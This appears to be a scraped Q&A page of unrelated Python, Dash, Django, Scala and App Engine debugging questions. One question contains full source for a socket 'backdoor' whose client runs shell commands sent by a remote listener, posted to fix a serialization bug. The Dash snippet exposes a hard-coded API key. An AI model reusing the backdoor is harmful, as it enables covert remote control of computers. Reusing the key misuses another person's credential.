Creating a dataset - dataset

I am trying to extract tweets from a specific hashtag, and save them in csv file. The below code works well, but I would like to split data. How can I split it.
Any advice will be highly appreciated,
Niddal
# -*- coding: utf-8 -*-
from __future__ import absolute_import, print_function
from tweepy import Stream
from tweepy import OAuthHandler
from tweepy.streaming import StreamListener
import time
import json
import codecs
import sys
ckey = ''
csecret = ''
atoken = ''
asecret = ''
non_bmp_map = dict.fromkeys(range(0x10000, sys.maxunicode + 1), 0xfffd)
class StdOutListener(StreamListener):
def on_data(self, data):
try:
tweet = json.loads(data)['text']
#tweet = data.split(',"text":"')[1].split('","source')[0]
print(tweet.translate(non_bmp_map))
saveThis = str(time.time())+'::'+tweet
SaveFile = codecs.open('d:\\StremHash.csv','a', "utf-8")
SaveFile.write(saveThis)
SaveFile.write('\n')
SaveFile.close()
return True
except BaseException, e:
print ('failed on data,',str(e))
time.sleep(5)
def on_error(self, status):
print(status)
if __name__ == '__main__':
l = StdOutListener()
auth = OAuthHandler(ckey, csecret)
auth.set_access_token(atoken, asecret)
twitterStream = Stream(auth, l)
twitterStream.filter(track=[unicode("#عيدكم_مبارك","utf-8")])

Related

Socket Serialization Error , a bytes-like object is required, not 'str'

I tried Encoding but is not working can anyone help me with the serialization in python3 a bytes-like object is required, not 'str'
#!/usr/bin/python3
import socket
import json
import pickle
class Listener:
def __init__(self,ip,port):
listener = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
listener.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
listener.bind((ip,port))
listener.listen(0)
print("[+] Waiting for Incoming Connection")
self.connection,address = listener.accept()
print(("[+] Got a Connection from " + str(address)))
def serialize_send(self, data):
data_send = json.dumps(data)
return self.connection.send(data_send)
def serialize_receive(self):
json_dataX = ""
while True:
try:
# #json_data = json_data + self.connection.recv(1024)
# data = self.connection.recv(1024).decode("utf-8", errors="ignore")
# json_data = json_data + data
# return json.loads(json_data)
json_data = bytes(json_dataX, 'utf-8')+ self.connection.recv(1024)
return json.loads(json.loads(json_data.decode('utf8')))
except ValueError:
continue
def execute_remotely(self,command):
self.serialize_send(command)
if command[0] == "exit":
self.connection.close()
exit()
return self.serialize_receive()
def run(self):
while True:
comX = input(">> : ")
command = comX.split(" ")
try:
sys_command = str(command[0])
result = self.execute_remotely(sys_command)
except Exception as errorX:
result = errorX
print(result)
my_backdoor = Listener("localhost",1234)
my_backdoor.run()
Client Code
#!/usr/bin/python3
import socket
import subprocess
import json
import pickle
class Backdoor:
def __init__(self,ip,port):
self.connection=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
self.connection.connect(("localhost",1234))
def serialize_send(self,data):
json_data = json.dumps(data)
self.connection.send(json_data)
def serialize_receive(self):
json_dataX = ""
while True:
try:
#conn_Recv = self.connection.recv(1024)
#data = self.connection.recv(1024).decode("utf-8", errors="ignore")
#json_data = json_dataX + data
json_data = bytes(json_dataX, 'utf-8') + self.connection.recv(1024)
return json.loads(json.loads(json_data.decode('utf8')))
except ValueError:
continue
def execute_system_commmand(self,command):
return subprocess.check_output(command,shell=True)
def run(self):
while True:
commandx = self.serialize_receive()
command = commandx
try:
if command[0] == "exit":
self.connection.close()
exit()
else:
command_result = self.execute_system_commmand(command)
except Exception:
command_result = "[-] Unknown Execution."
self.serialize_send(command_result)
my_backdoor = Backdoor("localhost",1234)
my_backdoor.run()

Display dash datatable through callback

I want to be able to return a populated dash table based on the results from an input search. I've tried 2 methods so far - returning the entire DashTable in the callback output and returning the columns and data separately in the callback. Both options haven't been working for me. I've included the relevant code for each option and the error message that results from each:
Return the data and columns separately:
#app.callback(
[Output('table', 'data'),
Output('table', 'columns')],
[Input("button", "n_clicks")], state=[State('url', 'value')])
def update_table(n_click:int, url):
if n_click>1:
summary, table = summarizer(url)
columns=[{"name": i, "id": i, "deletable": True, "selectable": True} for i in table.columns]
table = table.to_dict('records')
return table, columns
else:
return [], []
The app.layout contains the following line
html.Div(dt.DataTable(id='table'))
The error message that results from this is:
Objects are not valid as a React child
The second approach was to pass in the entire DataTable through the callback and display it using just the html.Div in the layout like this
#app.callback(
Output('table', 'children'),
[Input("button", "n_clicks")], state=[State('url', 'value')])
def update_table(n_click:int, url):
if n_click>1:
summary, table = summarizer(url)
columns=[{"name": i, "id": i, "deletable": True, "selectable": True} for i in table.columns]
table = table.to_dict('records')
return dt.DataTable(data=table, columns=columns)
else:
return []
html.Div(id='table')
The corresponding error was
[Objects are not valid as a React child][2]
This error is confusing to me since it seems to be regarding the column definition however I can't pass in an array and the documentation asks for a dictionary.
Full code sample:
import dash
import dash_core_components as dcc
import dash_html_components as html
import dash_bootstrap_components as dbc
import dash_table as dt
from dash.dependencies import Input, Output, State
import sd_material_ui
from newspaper import Article
import gensim
from gensim.summarization import summarize
from dash.exceptions import PreventUpdate
from newspaper import fulltext
import requests
import pandas as pd
import yake
import nltk
from newsapi import NewsApiClient
leftSources = ["cnn", "buzzfeed", "the-washington-post", "bbc-news", "vice-news", "newsweek", "techcrunch", "reuters", "politico", "newsweek", "msnbc"]
rightSources = ["fox-news", "national-review", "new-york-magazine", "breitbart-news", "business-insider", "the-wall-street-journal", "bloomberg", "the-washington-times", "the-hill", "the-american-conservative"]
# importing CSS
external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']
# similarArticleURL
getSimilarArticlesURL = "https://us-central1-secure-site-266302.cloudfunctions.net/getSimilarArticles?keywords="
getKeywordsURL = "https://us-central1-secure-site-266302.cloudfunctions.net/getKeyword?text="
getArticleTextURL = "https://us-central1-secure-site-266302.cloudfunctions.net/getArticleText?url="
allData = pd.DataFrame()
# instantiating dash application
app = dash.Dash(__name__, external_stylesheets=[dbc.themes.BOOTSTRAP])
server = app.server # the flask app
# helper functions
def generate_table(dataframe, max_rows=10):
return html.Table([
html.Thead(
html.Tr([html.Th(col) for col in dataframe.columns])
),
html.Tbody([
html.Tr([
html.Td(dataframe.iloc[i][col]) for col in dataframe.columns
]) for i in range(min(len(dataframe), max_rows))
])
])
app.layout = html.Div([
html.Div(html.H3("Brief.Me"), style={'font-weight':'bold','background-color':'darkorange', 'color':'white','text-align':'center'}),
html.Br(),
html.Br(),
dbc.Row([
dbc.Col(dbc.Input(id='url', type='url', size=30, placeholder="Type or copy/paste an URL"), width={'size':6, 'order':1, 'offset':3}),
dbc.Col(dbc.Button("Summarize", id='button', n_clicks=1, color="primary", className="mr-1"), width={'order':2})
]),
html.Br(),
# dbc.Row([
# dbc.Col(dcc.Loading(html.Div(html.Div(id="summary"), style={'font-weight':'bold'})), width={'size':6, 'offset':3})
# ]),
html.Div(id='table')
],
)
def fetch_similar_articles(keyword):
tokenizer = nltk.data.load('tokenizers/punkt/english.pickle')
newsapi = NewsApiClient(api_key='ce7482cbd40f4d90a8eea404e7702db6')
top_headlines = newsapi.get_top_headlines(q=keyword,
sources='bbc-news,the-wall-street-journal,the-washington-post,fox-news,bloomberg, vice-news, politico, reuters, the-hill',
language='en')
return top_headlines["articles"]
def fetch_article_text(url):
try:
article = Article(url)
article.download()
article.parse()
return article.text
except:
return None
def summarizer(url):
global allData
leftSummaries, rightSummaries = {}, {}
text = fetch_article_text(url)
main_summary = summarize(text)
keywords = extract_keywords(text)
urls = []
rightData, leftData, allData = get_articles_content(keywords)
rightDf, leftDf = pd.DataFrame(rightData), pd.DataFrame(leftData)
allSources = pd.concat([rightDf, leftDf], axis=1)
return main_summary, allData
def get_articles_content(keywords):
'''
This function will return a row of the dataframe where there is a title, source, url and summary.
'''
allResults, leftRows, rightRows = [], [], []
for keyword in keywords:
articleList = fetch_similar_articles(keyword)
for elem in articleList:
source = elem['source']
url = elem['url']
title = elem['title']
text = fetch_article_text(url)
if text is not None and len(text) > 1:
summary = summarize(text)
allResults.append({'title': title, 'url': url,'source': source, 'summary': summary})
if source in leftSources:
leftRows.append(pd.DataFrame({'title': title, 'url': url,'source': source, 'summary': summary}))
elif source in rightSources:
rightRows.append(pd.DataFrame({'title': title, 'url': url, 'source': source, 'summary': summary}))
allResults = pd.DataFrame(allResults)
return leftRows, rightRows, allResults
def extract_keywords_yake(text, phrase_length, num_keywords):
custom_kw_extractor = yake.KeywordExtractor(n=phrase_length, top=num_keywords)
keywords = custom_kw_extractor.extract_keywords(text)
return keywords
def extract_keywords(text):
'''
Returns a list of keywords given the article text.
'''
global getKeywordsURL
getKeywordsURL += text
keywordRes = extract_keywords_yake(text, 2, 5)
keywords = []
for pair in keywordRes:
keywords.append(pair[1])
return keywords
#app.callback( # Output('summary', 'children')
Output('table', 'children'),
[Input("button", "n_clicks")], state=[State('url', 'value')])
def update_table(n_click:int, url):
if n_click>1:
summary, table = summarizer(url)
columns=[{"name": i, "id": i, "deletable": True, "selectable": True} for i in table.columns]
table = table.to_dict('records')
return dt.DataTable(data=table, columns=columns)
else:
return [], []
if __name__ == '__main__':
app.run_server(debug=True, host='0.0.0.0', port=8080)

How to increase the timeout on cookiecutter-django

I'm processing some data from the redis cache. But it seems like I cannot process it fast enough to fit within the request timeout. Is there a way to increase the timeout in nginx or django? (I'm not even sure if cookiecutter-django has nginx).
# views.py
from rest_framework import viewsets
from rest_framework.response import Response
from rest_framework.pagination import PageNumberPagination
class SmallResultsSetPagination(PageNumberPagination):
page_size = 5
page_size_query_param = "page_size"
class FooViewSet(viewsets.ModelViewSet):
queryset = Foo.objects.all().order_by("id")
serializer_class = FooSerializer
pagination_class = SmallResultsSetPagination
filterset_fields = ["bar"]
# serializers.py
from rest_framework import serializers
from .models import Foo
class FooSerializer(serializers.ModelSerializer):
id = serializers.IntegerField(read_only=True)
DT_RowId = serializers.SerializerMethodField()
def get_DT_RowId(self, obj):
return obj.id
class Meta:
model = Foo
fields = (
"id",
"DT_RowId",
"name",
"baz",
"api_data",
)
datatables_always_serialize = ("baz", "api_data")
# models.py
import logging
import xml.etree.ElementTree as ElementTree
from django.conf import settings
from django.contrib.auth import get_user_model
from django.core.cache import cache
from django.db import models
from django.utils.functional import cached_property
import requests
from requests.exceptions import ConnectionError, Timeout
logger = logging.getLogger(__name__)
def third_party_api():
bars = cache.get("bars")
if bars:
print("cache hit")
return bars
def bars_to_dict(root):
bars = {}
for bar in root[1]:
bar_name = issuer.tag
entry = {}
for pair in bar:
tag = pair.tag.split("}")[-1]
value = pair.text
entry[tag] = value
key = entry["buzz"].strip().lower()
bars[key] = entry
return bars
try:
r = requests.get(
f"{API}", timeout=5,
)
root = ElementTree.fromstring(r.text)
bars = bars_to_dict(root)
cache.set("bars", bars, 60 * 5)
return bars
except (ConnectionError, Timeout) as e:
if settings.DEBUG:
tree = ElementTree.parse("scripts/bars.xml")
root = tree.getroot()
bars = bars_to_dict(root)
cache.set("bars", bars, 60 * 5)
return bars
else:
return {}
class Foo(models.Model):
baz = models.BooleanField(default=False)
#cached_property
def api_data(foo):
bars = third_party_api()
match = bars.get(foo.id)
if match:
field = match.get("biz", False)
return field == "true"
else:
return False
when I hit the browsable api on staging https://host.com/api/foos/?page_size=7 I get Bad Gateway for page_size values > 7. I'm pretty sure I'm doing too much computation for the default timeout.
The setting is inside settings/base.py
https://github.com/pydanny/cookiecutter-django/blob/8d5542d6754b520e0698286d8a0e6b6fc1257715/%7B%7Bcookiecutter.project_slug%7D%7D/config/settings/base.py#L289
# http://docs.celeryproject.org/en/latest/userguide/configuration.html#task-time-limit
CELERY_TASK_TIME_LIMIT = 5 * 60
# http://docs.celeryproject.org/en/latest/userguide/configuration.html#task-soft-time-limit
CELERY_TASK_SOFT_TIME_LIMIT = 60
the units are in seconds.

Uploading file from Angular ng-file-upload to Play for Scala

I'm trying to upload a .csv file using ng-file-upload in the browser and Play for Scala 2.5.x at the backend.
If I use moveTo in Play the file is uploaded, but generated with headers and trailers instead of the plain file:
request.body.moveTo(new File("c:\\tmp\\uploaded\\filetest.csv"))
Is there a way to save only the data part?
Alternatively, I tried the following
def doUpload = Action(parse.multipartFormData) { request =>
println(request.contentType.get)
println(request.body)
request.body.file("file").map { file =>
val filename = file.filename
val contentType = file.contentType
file.ref.moveTo(new File("c:\\tmp\\uploaded\\filetest.csv"))
}
Ok("file uploaded at " + new java.util.Date())
}
But the map is empty. This is what I get in the first two println statements:
multipart/form-data
MultipartFormData(Map(),Vector(FilePart(file,hello2.csv,Some(application/vnd.ms-excel),TemporaryFile(C:\Users\BUSINE~1\AppData\Local\Temp\playtemp2236977636541678879\multipartBody2268668511935303172asTemporaryFile))),Vector())
Meaning that I am receiving something, however I cannot extract it. Any ideas?
A bit verbose maybe but it does what you want.
Note that I am on a Mac so you may have to change the /tmp/uploaded/ path in copyFile since it looks like you are on Windows.
package controllers
import java.io.File
import java.nio.file.attribute.PosixFilePermission._
import java.nio.file.attribute.PosixFilePermissions
import java.nio.file.{Files, Path}
import java.util
import javax.inject._
import akka.stream.IOResult
import akka.stream.scaladsl._
import akka.util.ByteString
import play.api._
import play.api.data.Form
import play.api.data.Forms._
import play.api.i18n.MessagesApi
import play.api.libs.streams._
import play.api.mvc.MultipartFormData.FilePart
import play.api.mvc._
import play.core.parsers.Multipart.FileInfo
import scala.concurrent.Future
import java.nio.file.StandardCopyOption._
import java.nio.file.Paths
case class FormData(filename: String)
// Type for multipart body parser
type FilePartHandler[A] = FileInfo => Accumulator[ByteString, FilePart[A]]
val form = Form(mapping("file" -> text)(FormData.apply)(FormData.unapply))
private def deleteTempFile(file: File) = Files.deleteIfExists(file.toPath)
// Copies temp file to your loc with provided name
private def copyFile(file: File, name: String) =
Files.copy(file.toPath(), Paths.get("/tmp/uploaded/", ("copy_" + name)), REPLACE_EXISTING)
// FilePartHandler which returns a File, rather than Play's TemporaryFile class
private def handleFilePartAsFile: FilePartHandler[File] = {
case FileInfo(partName, filename, contentType) =>
val attr = PosixFilePermissions.asFileAttribute(util.EnumSet.of(OWNER_READ, OWNER_WRITE))
val path: Path = Files.createTempFile("multipartBody", "tempFile", attr)
val file = path.toFile
val fileSink: Sink[ByteString, Future[IOResult]] = FileIO.toPath(file.toPath())
val accumulator: Accumulator[ByteString, IOResult] = Accumulator(fileSink)
accumulator.map {
case IOResult(count, status) =>
FilePart(partName, filename, contentType, file)
} (play.api.libs.concurrent.Execution.defaultContext)
}
// The action
def doUpload = Action(parse.multipartFormData(handleFilePartAsFile)) { implicit request =>
val fileOption = request.body.file("file").map {
case FilePart(key, filename, contentType, file) =>
val copy = copyFile(file, filename)
val deleted = deleteTempFile(file) // delete original uploaded file after we have
copy
}
Ok(s"Uploaded: ${fileOption}")
}

Adding methods to GAE database class

I am messing around with GAE. I want to place my database object in one file and call it from another. Here is the DB object:
import webapp2
import os
import jinja2
import json
import logging
import main
from google.appengine.ext import db
class User(db.Model):
user_name = db.StringProperty(required = True)
hashed_password = db.StringProperty(required = True)
email = db.EmailProperty(required = True)
created_dttm = db.DateTimeProperty(auto_now_add = True)
last_modified = db.DateTimeProperty(auto_now = True)
coords = db.GeoPtProperty(required = False)
# def as_dict(self):
# time_fmt = '%c'
# d = {
# 'subject':self.subject,
# 'content':self.content,
# 'created':self.created_dttm.strftime(time_fmt),
# 'last_modified': self.last_modified.strftime(time_fmt)
# }
# return d
def isValueUnique(self,column,value):
result = None
q = User.all()
q.filter(column, value)
result = q.get()
return result
I cannot instantiate the DB because it thinks I'm trying to store data.
I want to call the isValueUnique method from another file like so:
import webapp2
import os
import jinja2
import json
import logging
import main
import database
import validation
from google.appengine.ext import db
class SignUp(main.Handler):
def post(self):
user_username = self.request.get("username")
user_email = self.request.get("email")
user_pass = self.request.get("password")
user_verify = self.request.get("verify")
valid = validation.Valid()
error1=""
error2=""
error3=""
error4=""
q = database.User.all()
q.filter("username =", user_username)
result = q.get()
if result:
error1="Username already taken"
if (not valid.valid_user(user_username)) and (not error1):
error1 = "Enter a valid username"
if not valid.valid_password(user_pass):
error2 = "Enter a valid password"
if not valid.valid_pass_match(user_pass,user_verify):
error3 = "Passwords must match"
# Email Validation
email=valid.valid_email(user_email)
if not email:
error4 = "Invalid email"
email=""
elif not database.User.isValueUnique("email",email):
error4 = "Email already in use, please sign in"
email=""
I get this error:
elif not database.User.isValueUnique("email",email):
TypeError: unbound method isValueUnique() must be called with User instance as first argument (got str instance instead)
I can't instantiate User like I already said. What is the work around here?
database.User.isValueUnique("email",email)
This is attempting to call a method on the database.User class, but isValueUnique is an instance method.
If you decorate isValueUnique with #staticmethod you'll get farther.
Where are you trying to instantiate a User?

Resources